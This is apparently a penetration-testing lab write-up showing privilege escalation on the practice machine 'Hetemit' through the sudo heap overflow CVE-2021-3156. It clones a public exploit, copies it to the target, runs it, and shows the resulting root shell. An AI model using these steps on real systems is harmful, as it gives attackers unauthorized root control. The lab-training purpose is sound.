InfoSec LAB

Hetemit_Privilege_Escalation_3

Created: 2 min read

CVE-2021-3156

PEAS has identified that the target system is vulnerable to CVE-2021-3156

A vulnerability was found in sudo up to 1.8.31p2/1.9.5p1 (Operating System Utility Software). It has been rated as critical. This issue affects the function sudoers_policy_main. The manipulation with an unknown input leads to a heap-based overflow vulnerability. Using CWE to declare the problem leads to CWE-122. A heap overflow condition is a buffer overflow, where the buffer that can be overwritten is allocated in the heap portion of memory, generally meaning that the buffer was allocated using a routine such as malloc(). Impacted is confidentiality, integrity, and availability.

Exploit

Exploit found online

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/hetemit]
└─$ git clone https://github.com/worawit/CVE-2021-3156 ; tar -czf CVE-2021-3156.tar.gz CVE-2021-3156
Cloning into 'CVE-2021-3156'...
remote: Enumerating objects: 86, done.
remote: Counting objects: 100% (18/18), done.
remote: Compressing objects: 100% (8/8), done.
remote: Total 86 (delta 16), reused 10 (delta 10), pack-reused 68 (from 1)
Receiving objects: 100% (86/86), 41.65 KiB | 1.16 MiB/s, done.
Resolving deltas: 100% (46/46), done.

Downloading & packaging the exploit

Exploitation

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/hetemit]
└─$ scp -i ~/.ssh/id_ed25519 ./CVE-2021-3156.tar.gz cmeeks@$IP:/var/tmp/                       
Enter passphrase for key '/home/kali/.ssh/id_ed25519': 
CVE-2021-3156.tar.gz             100%   82KB 884.2KB/s   00:00

Delivery complete

[cmeeks@hetemit tmp]$ tar -xf CVE-2021-3156.tar.gz ; cd CVE-2021-3156
[cmeeks@hetemit CVE-2021-3156]$ python3 exploit_nss.py 
 
We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:
 
    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.
 
[root@hetemit CVE-2021-3156]# whoami
root
[root@hetemit CVE-2021-3156]# hostname
hetemit
[root@hetemit CVE-2021-3156]# /sbin/ifconfig
ens160: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.218.117  netmask 255.255.255.0  broadcast 192.168.218.255
        ether 00:50:56:9e:bf:75  txqueuelen 1000  (Ethernet)
        RX packets 24141  bytes 4027871 (3.8 MiB)
        RX errors 0  dropped 296  overruns 0  frame 0
        TX packets 14119  bytes 3873777 (3.6 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 717  bytes 238513 (232.9 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 717  bytes 238513 (232.9 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

System Level Compromise

Interactive Graph View

Backlinks